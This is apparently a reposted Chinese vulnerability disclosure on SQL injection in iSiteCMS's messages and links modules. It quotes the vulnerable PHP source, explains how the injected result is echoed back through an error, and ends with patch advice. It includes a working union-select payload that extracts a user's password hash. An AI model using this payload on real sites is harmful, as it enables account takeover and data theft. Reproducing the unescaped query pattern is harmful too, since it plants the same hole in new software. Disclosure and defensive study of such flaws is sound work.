来源:自学PHP网 时间:2015-04-15 14:59 作者: 阅读:次
[导读] iSiteCMS 之前有过一个后台登陆时的注射,不过后来修复了,但是还有几处注射分布在XX模块以及XXX模块里本文对源代码进行了详细的分析源码分析请见详细说明,实站演示请见漏洞证明...
iSiteCMS 之前有过一个后台登陆时的注射,不过后来修复了,但是
还有几处注射分布在XX模块以及XXX模块里
本文对源代码进行了详细的分析
源码分析请见详细说明,实站演示请见漏洞证明
/isite/components/messages/messages.fe.php line:103
if($form->status == TFORM_STATUS_GETED_VALID){ //这个是站内短信的写信息表单 的 处理 $arr = $form->getValues(); //直接获取表单中信息 $tos = explode(',',trim($arr['to'])); //只是分割,不是过滤 $noExistsMenber = array(); $toMenbers = array(); foreach ($tos as $menber){ $i = $this->DBE->getOne("select `id` from #__user where `name`='$menber'"); //一直到上面这一句都没有过滤,直接带入数据库查询了,之所以会这么写可能的原因是开发人员误以为`name`='$menber'的引号可以起到保护作用(其他的int变量都通过了inval,而这个是string啊喵,我可以输入单引号啊喵) if(is_null($i) or empty($i)){ $noExistsMenber[] = $menber; //id只要有返回就可以继续 }else{ $m['name'] = $menber; $m['id'] = $i; $toMenbers[] = $m; } } if(!empty($noExistsMenber)){ addGlobalNotice("以下用户不存在:".implode(',',$noExistsMenber)); }else{ $msg['tos'] = $arr['to']; $msg['subject'] = $arr['subject']; $msg['content'] = $arr['content']; //进入信息发送的模块了,实际上之前就已经引发注射了,但是攻击时需要读sendMessage代码 $mMessage->sendMessage($toMenbers,$msg); $this->flash('成功','发送成功',bu(1,'messages','inbox')); }
这个就是代码里的表单显示
先来个同理可证:
/isite/components/links/links.be.php line:64
if($form->status == TFORM_STATUS_GETED_VALID){ $newCat = $form->getValues(); if($id==0){ //create category //check name $name = $newCat['name']; $nameUsed = $this->DBE->getOne("select count(*) from #__link_category where `name`='$name'"); if($nameUsed){ $form->status = TFORM_STATUS_GETED;
看完以上代码是不是有一种似曾相识的感觉呢?
漏洞成因分析完毕
下面是对于攻击方式的分析,如果您只关心如何把漏洞补上,也可以直接跳过以下内容到漏洞修复那里
注射肯定是有了,但是这里有一点点别扭的地方,就是
$tos = explode(',',trim($arr['to']));
这句话把逗号给干掉了,给注射添加了小小难度,不过,这能难倒WOOYUN的帽子们吗?
继续分析代码:
/isite/components/messages/models/message.php 整个php
function sendMessage($to,$message,$type=null,$newCall=1){ //刚才检测完用户是否存在后,调用这个函数 if(isset($to['name']) or is_string($to)){ if(is_string($to)){ $to['name'] = $to; } if(!isset($to['id'])){ //还记得id吗,是之前被注射SQL的返回,理论上正常应该是目标用户的id $to['id'] = $this->_db->getOne("select `id` from #__user where `name`='$to[name]'"); } //又SELECT一遍,不过name还是注射时的name,这一句也被注射了 global $gUser; $message['to'] = $to['name']; $message['to_id'] = $to['id']; $message['from'] = $gUser->name; $message['from_id'] = $gUser->id; $message['create_time'] = TIME_STAMP; $message['type'] = $type; $this->insert($message); //看到下一句,终于长舒一口气,注射可以有回显了!to_id就是我们的语句执行结果,而它会报错给我们看的! $this->_db->execute("update #__user set `new_msg_count`=`new_msg_count`+1 where `id`=$message[to_id]"); if($newCall>0){ $message['to'] = ''; $message['to_id'] = 0; $this->insert($message); $newCall--; } }else if(is_array($to)){ foreach ($to as $sto){ $this->sendMessage($sto,$message,null,$newCall); } } }
注射+回显方法 :
test' and 1=2 union select password from flexi_user where id=1#
union select 后面加你想看的内容即可,不过记着不能用逗号哦
修补方式分析:
目前的状态是:数字型+语句中单引号(可防注射);字符型+语句中单引号(仍能注射)
主要需要考虑字符型变量的过滤问题
可以addslashes,也可以用普通过滤
也可以用框架提供的安全特性
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com